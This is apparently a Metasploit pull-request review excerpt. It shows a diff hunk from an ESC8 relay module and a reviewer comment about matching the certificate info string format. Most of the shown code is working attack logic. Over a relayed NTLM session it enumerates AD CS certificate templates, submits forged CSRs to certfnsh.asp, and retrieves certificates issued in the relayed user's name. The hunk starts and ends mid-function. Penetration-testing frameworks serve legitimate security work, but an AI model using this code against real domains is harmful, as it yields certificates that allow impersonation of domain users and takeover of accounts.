modules/auxiliary/server/capture/esc8_relay.rb

```diff
@@ -0,0 +1,187 @@
+        end
+      end
+    end
+    unless datastore['QUERY_ONLY']
+      if cert_list.nil? || cert_list.include?(datastore['CERT_TEMPLATE'])
+        # if we don't have a cert list or if the cert is in the list, just generate that cert
+        retrieve_cert(client_socket, datastore['CERT_TEMPLATE'], authenticated_username)
+      else
+        # if we have a cert list and the desired template is not there
+        # or the desired template is nil, just issue all available certs
+        print_bad("#{datastore['CERT_TEMPLATE']} not found in available certificates") unless datastore['CERT_TEMPLATE'].nil?
+        print_status('Attempting to generate certificates for all templates')
+        cert_list.each do |cert_entry|
+          retrieve_cert(client_socket, cert_entry, authenticated_username)
+        end
+      end
+    end
+  end
+
+  def get_cert_list(client_socket)
+    req = client_socket.request_raw(
+      {
+        'method' => 'GET',
+        'uri' => "#{datastore['CERT_URI']}/certrqxt.asp"
+      }
+    )
+    res = client_socket._send_recv(req, @http_timeout, true)
+    raw_list = res.body.scan(/^.*Option Value="E;(.*?);/)
+    user_list = []
+    raw_list.each do |element|
+      user_list.append(element[0])
+    end
+    return user_list
+  end
+
+  def retrieve_cert(client_socket, cert_template, authenticated_user)
+    vprint_status("Sending Post to generate certificate for #{authenticated_user} using the #{cert_template} template")
+    private_key = OpenSSL::PKey::RSA.new(4096)
+    request = create_csr(private_key, cert_template)
+    cert_template_string = "CertificateTemplate:#{cert_template}"
+    req = client_socket.request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => "#{datastore['CERT_URI']}/certfnsh.asp",
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => {
+          'Mode' => 'newreq',
+          'CertRequest' => request.to_s,
+          'CertAttrib' => cert_template_string,
+          'TargetStoreFlags' => 0,
+          'SaveCert' => 'yes',
+          'ThumbPrint' => ''
+        }
+      }
+    )
+    res = client_socket._send_recv(req, @http_timeout, true)
+    vprint_status('Post Sent')
+    if res&.code == 200 && !res.body.include?('request was denied')
+      print_good("Certificate Request Granted using template #{cert_template} and user #{authenticated_user}")
+    else
+      print_bad("Certificate Request Denied using template #{cert_template} and user #{authenticated_user}")
+      return false
+    end
+
+    location_tag = res.body.match(/^.*location="(.*)"/)[1]
+    vprint_status("Certificate location tag = #{location_tag}")
+    location_uri = "#{datastore['CERT_URI']}/#{location_tag}"
+    vprint_status('Requesting Certificate from Relay Target...')
+    req = client_socket.request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => location_uri
+      }
+    )
+    res = client_socket._send_recv(req, @http_timeout, true)
+    info = nil
```

Comment:
Can we make the info string here [match](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/ms_icpr.rb#L210)? It'll be important if we ever need to pull the certificates out programmatically.